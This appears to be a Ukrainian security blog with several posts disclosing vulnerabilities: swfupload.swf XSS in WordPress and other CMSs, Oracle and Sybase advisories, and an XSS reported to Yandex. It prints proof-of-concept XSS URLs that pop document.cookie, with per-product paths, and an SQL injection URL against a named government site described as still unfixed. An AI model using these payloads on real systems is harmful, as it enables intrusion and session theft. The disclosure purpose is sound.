Websecurity - Веб безпека

Раніше я писав про XSS уразливість в swfupload в WordPress і ця дірка має місце в багатьох інших веб додатках.

Зокрема я виявив дану Cross-Site Scripting уразливість в Dotclear, XenForo, InstantCMS, AionWeb, Dolphin - серед багатьох веб додатків, що постачаються з swfupload.swf.

XSS:

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// 

Уразливі потенційно всі версії Dotclear, InstantCMS, AionWeb, Dolphin (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Уразливі версії XenForo 1.0.0 - 1.1.2. В XenForo 1.1.3 дана уразливість була виправлена і випущений патч для попередніх версій (ще 19.06.2012).

Розробники WP випустили оновлену версію флешки (те саме зробили розробники XenForo), яку могли використати всі веб розробники, що використовують swfupload.

Виявлені численні уразливості безпеки в продуктах Oracle, Sun, People Soft і MySQL.

Уразливі продукти: Oracle 10g, Oracle 11g, MySQL 5.1, MySQL 5.5, Oracle Application Server 10g, Oracle E-Business Suite Release 11i, PeopleSoft Enterprise HRMS 9.0, PeopleSoft Enterprise PeopleTools 8.50, Oracle Secure Backup 10.4, JRockit 28.2 та інші продукти Oracle.

Біля 90 різноманітних уразливостей у різних продуктах.

• Multiple vulnerabilities in Oracle WebCenter Sites (former FatWire Content Server) (деталі)
• Multiple SQL Injection in Oracle Enterprise Manager (SQL Tunning Sets components) (деталі)
• Oracle Critical Patch Update Advisory - July 2012 (деталі)

В квітні була анонсована Cross-Site Scripting уразливість в swfupload.swf в WordPress (CVE-2012-3414). Яка була виправлена в WordPress 3.3.2. Але на той час про неї не було жодної детальної інформації. Ця дірка була знайдена Neal Poole і Nathan Partlan. І 17.05.2012 Ніл оприлюднив її в себе на сайті.

На початку місяця я звернув увагу, що почали з’являтися нові описи XSS дірки в swfupload.swf в інших веб додатках. Як у плагіні WordPress Shopp, де я її знайшов. З чого стало зрозумілим, що деталі цієї уразливості вже були оприлюднені.

Після чого я зробив дослідження і виявив різні версії swf-файла (з різними іменами) та всі версії WordPress, що містять будь-які з цих swf-файлів. Тобто не одна флешка (згадана Нілом), а дві флешки з різними іменами мають цю XSS. Це лише в WP, бо існують версії цієї флешки ще з іншими іменами в інших веб додатках, про що я розповім окремо.

XSS:

http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

WordPress 2.7-3.3.1.

http://site/wp-includes/js/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

WordPress 2.5-2.7.1.

20.04.2012 в WordPress 3.3.2 дана уразливість була виправлена. Розробники WP випустили оновлену версію флешки, яку могли використати всі веб розробники, що використовують swfupload.

Уразливі версії WordPress 2.5 - 3.3.1.

Файл swfupload.swf постачається з WordPress 2.7 - 3.3.1.

Файл swfupload_f9.swf постачається з WordPress 2.5 - 2.7.1.

У версіях WP 2.7 - 2.7.1 присутні обидві флешки.

Swfupload використовується в WordPress, в плагінах до нього та в інших веб додатках. Уразливість в swfupload - це дірка “мільйонник”. Тільки в одному WP вона була поширена на десятках мільйонах сайтів (за статистикою wordpress.com, зараз в світі більше 57,5 мільйонів сайтів на WP).

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://avtovokzal.gov.ua - інфікований державний сайт - інфекція була виявлена 16.10.2012. Зараз сайт не входить до переліку підозрілих.
• http://ero.od.ua - інфекція була виявлена 02.09.2012. Зараз сайт не входить до переліку підозрілих.
• http://arey.com.ua - інфекція була виявлена 06.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://mwm-kiev.com.ua - інфекція була виявлена 11.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://didjeridu.org.ua - інфекція була виявлена 06.10.2012. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Symantec Endpoint Protection SemSvc.exe AgentServlet Remote Code Execution Vulnerability (деталі)
• Unirgy uStoreLocator SQL Injection - Magento extension (деталі)
• CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies (деталі)
• Multiple vulnerabilities in Template CMS (деталі)
• SAP Crystal Reports crystalras.exe OBUnmarshal Remote Code Execution Vulnerability (деталі)
• Multiple vulnerabilities in OpenX (деталі)
• Multiple vulnerabilities in jCore (деталі)
• Multiple vulnerabilities in Subrion CMS (деталі)
• (0Day) HP Diagnostics Server magentservice.exe Remote Code Execution Vulnerability (деталі)
• Multiple vulnerabilities in AContent (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах GRAND Flash Album Gallery, Spider Calendar та Shopp. Для котрих з’явилися експлоіти. GRAND Flash Album Gallery - це плагін для створення фото галерей, Spider Calendar - це органайзер і календар, Shopp - це плагін для створення онлайн-магазина.

• Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery Plugin (деталі)
• WordPress Spider 1.0.1 SQL Injection / XSS (деталі)
• WordPress Shopp 1.0.17 XSS / Shell Upload / Disclosure (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В минулому місяці, 26.10.2012, компанія Microsoft випустила фінальну версію браузера Internet Explorer 10. Компанія випустила його разом з Windows 8, в поставку якої він і входить (версія для Windows 7 буде випущена окремо). Вихід нової версії відбувся через півтора роки після виходу IE9.

Незважаючи на заяви Microsoft про підвищену безпеку нових Windows 8 та IE10, не встигли вони вийти, як їх швидко взломали. Експлоіт був розроблений компанією Vupen Security. Що цілком типово для програмних продуктів Microsoft.

Як я вже писав в новинах, з кінця вересня Яндекс розпочав свою програму “Полювання за помилками” і почав платити за уразливості. Я вирішив перевірити, що саме представляє з себе ця програма.

В жовтні, 05.10.2012, я знайшов Cross-Site Scripting уразливість на сайті http://pass.yandex.ru. Про що повідомив Яндексу. А також я знайшов багато інших уразливостей, але вирішив вислати одну - для початку.

Останній раз стосовно проектів Яндекс я писав про уразливості на afisha.yandex.ru.

XSS:

http://pass.yandex.ru/login?retpath=http://yandex.ru%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Скріншот:

Yandex XSS.png

Вже 06.10.2012, через пів доби після того, як я відправив їм листа, мені відповів представник компанії, що він не може відтворити дану уразливість (достатньо просту XSS, детальний опис якої я виклав у своєму листі, в тому числі кроки для відтворення). На що я їм написав, що ця XSS працює лише для залогінених користувачів, як вже зазначав у першому листі, та вислав їм скріншот (зроблений заздалегідь, бо я підозрював Яндекс у нечесності). Вже після відправлення цього листа, я перевірив цю дірку і виявив, що вона вже виправлена.

Після чого отримав відповідь від Яндекса, що мовляв цю дірку їм хтось інший повідомив раніше (ага, дірка висіла на сайті роками і ніхто її не знаходив до мене, і лише після мого повідомлення вона була виправлена). Тому вони мені її не зараховують. Зазначу, що представник компанії спочатку “не впізнав” уразливості та заявив, що нічого такого немає (бо не знав, що я зробив скріншот), і вже після отримання від мене скріншота, він “впізнав” її та почав розповідати нову історію. І на мою незгоду з такою позицією компанії, висловлену в наступному листі, вони не відповіли (тим самим закривши це питання).

Вся ця поведінка Яндекса не викликала в мене позитивних емоцій. Але щоб не робити висновки по одному інциденту я вирішив вислати компанії ще декілька інших уразливостей, щоб детально перевірити цю програму, розставити всі крапки над “і” та зробити фінальні висновки. Про які я напишу найближчим часом.

Виявлені уразливості безпеки в Sybase ASE.

Уразливі версії: Sybase ASE 15.0, Sybase ASE 15.5, Sybase ASE 15.7.

Виконання коду, підвищення привілеїв.

• Elevated roles through DBCC (деталі)
• Java Operating System command execution (деталі)

18.07.2012

У липні, 02.07.2012, я дослідив SQL Injection та Cross-Site Scripting уразливості на сайті http://www.asv.gov.ua. Про які мені повідомив AmplenuS, а коли я ці дві дірки перевірив, то знайшов іще одну. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

02.11.2012

SQL Injection:

http://www.asv.gov.ua/content.php?lang=uk&page=gallery&theme=-1%20or%20version()%3E5

У липні в них була версія MySQL 5.1.63-log, зараз MySQL 5.1.66-log. СУБД оновити не забули, але дірки на сайті як не виправляли, так і не виправляють.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.